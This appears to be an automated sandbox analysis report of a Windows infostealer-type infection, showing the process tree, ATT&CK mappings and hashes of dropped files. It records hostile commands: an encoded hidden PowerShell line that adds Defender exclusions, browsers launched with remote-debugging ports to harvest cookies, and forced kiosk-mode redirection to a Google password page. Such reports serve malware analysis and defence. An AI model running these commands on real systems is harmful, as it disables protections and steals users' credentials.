        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2412,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:2
        5⤵
        
        PID:4284
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1936,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:8
        5⤵
        
        PID:11628
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=3276 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3020
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=3296 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:10172
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4168,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=4208 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:1016
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4424,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=4412 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2808
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5104,i,4931316870262982601,8458705827403258450,262144 --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:8
        5⤵
        
        PID:4904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6796
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffaf609f208,0x7ffaf609f214,0x7ffaf609f220
        5⤵
        
        PID:1236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,1281641746135597771,1737007025928230405,262144 --variations-seed-version --mojo-platform-channel-handle=2848 /prefetch:3
        5⤵
        
        PID:6804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2504,i,1281641746135597771,1737007025928230405,262144 --variations-seed-version --mojo-platform-channel-handle=2588 /prefetch:2
        5⤵
        
        PID:6652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1732,i,1281641746135597771,1737007025928230405,262144 --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:8
        5⤵
        
        PID:7008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3500,i,1281641746135597771,1737007025928230405,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3508,i,1281641746135597771,1737007025928230405,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:1404
- - C:\Users\Admin\AppData\Local\Temp\10299500101\f8a851aef4.exe
    "C:\Users\Admin\AppData\Local\Temp\10299500101\f8a851aef4.exe"
    3⤵
    PID:9032
- - C:\Users\Admin\AppData\Local\Temp\10299510101\a12d678122.exe
    "C:\Users\Admin\AppData\Local\Temp\10299510101\a12d678122.exe"
    3⤵
    PID:1828
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      PID:3560
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffafa38dcf8,0x7ffafa38dd04,0x7ffafa38dd10
        5⤵
        
        PID:8704
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      PID:7192
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ffaf609f208,0x7ffaf609f214,0x7ffaf609f220
        5⤵
        
        PID:7616
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1824,i,8837861810810592117,14076718288150825420,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:3
        5⤵
        
        PID:10644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2148,i,8837861810810592117,14076718288150825420,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:2
        5⤵
        
        PID:11204
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1380,i,8837861810810592117,14076718288150825420,262144 --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:8
        5⤵
        
        PID:8948
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3536,i,8837861810810592117,14076718288150825420,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:10152
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,8837861810810592117,14076718288150825420,262144 --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:9876
- - C:\Users\Admin\AppData\Local\Temp\10299520101\955e5d33d5.exe
    "C:\Users\Admin\AppData\Local\Temp\10299520101\955e5d33d5.exe"
    3⤵
    PID:5848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:9912
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:672
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:12344
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:6160
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:7096
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:6996
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:6948
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {64cdc63e-f84e-4ce8-ae3f-d424cde37a1c} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:5128
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {d8611487-814d-470f-99a6-615a4e927e7a} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:8940
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3984 -prefsLen 25213 -prefMapHandle 3988 -prefMapSize 270279 -jsInitHandle 3992 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4036 -initialChannelId {0fa4d5cf-24fa-4bd6-9992-afe8a20a1445} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        
        PID:8708
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4232 -prefsLen 27325 -prefMapHandle 4236 -prefMapSize 270279 -ipcHandle 4300 -initialChannelId {4bd89a06-420e-4475-998f-ea877cbdc97b} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:11672
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3712 -prefsLen 34824 -prefMapHandle 3716 -prefMapSize 270279 -jsInitHandle 4464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4164 -initialChannelId {18b17277-5e46-4d71-85ee-360db31d9182} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        
        PID:5092
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4928 -prefsLen 34905 -prefMapHandle 4896 -prefMapSize 270279 -ipcHandle 4912 -initialChannelId {d2a6394f-16dc-4d9e-b84a-039d21d7892c} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        
        PID:6368
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5232 -prefsLen 32952 -prefMapHandle 5236 -prefMapSize 270279 -jsInitHandle 5240 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5220 -initialChannelId {0dc4f832-7479-4459-a5ce-f947a5b40839} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        
        PID:10220
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5436 -prefsLen 32952 -prefMapHandle 5440 -prefMapSize 270279 -jsInitHandle 5444 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5420 -initialChannelId {aa500aba-b48a-4f97-9e80-a26906bf2d16} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        
        PID:10664
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5608 -prefsLen 32952 -prefMapHandle 5612 -prefMapSize 270279 -jsInitHandle 5616 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5388 -initialChannelId {3f863be4-579e-4559-b9f8-3cde43888f22} -parentPid 6948 -crashReporter "\\.\pipe\gecko-crash-server-pipe.6948" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        
        PID:9804
- - C:\Users\Admin\AppData\Local\Temp\10299530101\c5843fa197.exe
    "C:\Users\Admin\AppData\Local\Temp\10299530101\c5843fa197.exe"
    3⤵
    PID:12684
- - C:\Users\Admin\AppData\Local\Temp\10299540101\4c989b52cc.exe
    "C:\Users\Admin\AppData\Local\Temp\10299540101\4c989b52cc.exe"
    3⤵
    PID:7640
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:2968
- - C:\Users\Admin\AppData\Local\Temp\10299550101\02b217f753.exe
    "C:\Users\Admin\AppData\Local\Temp\10299550101\02b217f753.exe"
    3⤵
    PID:6832
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10299550101\02b217f753.exe"
      4⤵
      PID:4964
- - C:\Users\Admin\AppData\Local\Temp\10299560101\804d73c5c6.exe
    "C:\Users\Admin\AppData\Local\Temp\10299560101\804d73c5c6.exe"
    3⤵
    PID:11084

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBkAGQALQBNAHAAUABSAGUAZgBlAFIARQBuAEMAZQAgAC0ARQBYAGMATAB1AFMAaQBvAE4AUABhAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBmAG8AcgBDAEUAOwAgAEEARABkAC0ATQBwAFAAUgBFAGYAZQBSAGUATgBjAEUAIAAtAGUAWABDAGwAdQBTAGkAbwBOAHAAcgBPAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0ARgBvAFIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6932

C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
1⤵
- Executes dropped EXE
PID:7372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6256 -ip 6256
1⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8064

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7288

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6724

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:11780

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:10292

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:8444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RuntimeApp\0000004419.exe

Filesize
654KB

MD5
3a19b94ec0669d0d7456ef988305e105

SHA1
acf2f11f1869e54d2b482dde5246365a19c20791

SHA256
eee92de5bab07681a780eff2be1de876815596b1c33d1a9ec31f4af05d1ec46d

SHA512
8e913bd3f8727064bbacb7cd3703a882a17232e80b6ab91a17ed3667888f4dca98c208f51d8154cfb7d793d2d09b81c33cdd2a140a3ec96e1188856ad81235c6

Download Submit
C:\ProgramData\CFCBKKKJ

Filesize
130KB

MD5
8b5868d78c8a9ae0c20df4c45bfb7c5f

SHA1
ff6e2c3e7074299d1cc9100cc57eb02124d3a178

SHA256
f896949d547d5b6399df6675f957e17413a7fb11831c2681832355c8d4eff202

SHA512
49e8bc5c1214a39025f9e789a41d23fb78b134b15940d8631be3debd1f2eca0ca6959fd0a8fb7796fffa9ce413c734086fe6daa01dd68d02622c179fe5d28723

Download Submit
C:\ProgramData\mgvs2\268qq9

Filesize
228KB

MD5
817ff630f04acf0aafee56e2401c329d

SHA1
8d9af04b38a22e3263790ed6ba1c98d3f1d3a027

SHA256
6405d09fcd4809dbd634d1330e78e075c2cc7ac2897bbe399eb3de744ce15842

SHA512
4fb4d9abfe1a1082c46c6c1fde2bf4da17813a7d1328ea9f49e58badab0e8d5a0e718916767ee4b547f5bca635d3f3d05060dbaaa4a40b70a03823d0372f9988

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
1.9MB

MD5
0d1af08f3e80600b823866f1a2fdc613

SHA1
4334f8087e35efd7a23eae3d56193e2f0741a003

SHA256
89918e8e7fcb36736ac63819fb5d45dab490f4c418f104e2a355dde6034ea90d

SHA512
008b1cd90024e9a2507c4e0c2602bb23e28dcb1de40edd36abb8cc258fb7aeb8e72776292c5ccb7d16196407c60b2a9ffdf10b6ef6dea4ffdef5d3c8b2ea9537

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
e2fd6fa8cef077bad2448c4ada2923aa

SHA1
23b29486afc2088b7ddfe02f17f9ec21d198fe52

SHA256
98df471c71eee1ae9537b226bd1b98be25b26592431e0ecebf2e6e3c152fea33

SHA512
35cd496710a51f509b71a6eea601e0f280c61d4d36253be853a86726db5e9f1f4fd65a6c3982f665723007c8c2164bd0d25bdf41ffa64eebd1f5218db1593385

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
5276d2daa3970b141b5c43edf6946d56

SHA1
bdf258865bae54f82c4534a40411cef8c011bf1a

SHA256
1d5d60316664674de44268a64a8afedb2e29925a49ffb529c0205a4f924f2acb

SHA512
28cfcdd46aa6498fe792186461edac646b0eef50dc3e110dd694cfc4d980f30196167a1997c963506e70b58c31b67e2382753f48784cd44bb038461d3a12aaf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
01cc3a42395638ce669dd0d7aba1f929

SHA1
89aa0871fa8e25b55823dd0db9a028ef46dfbdd8

SHA256
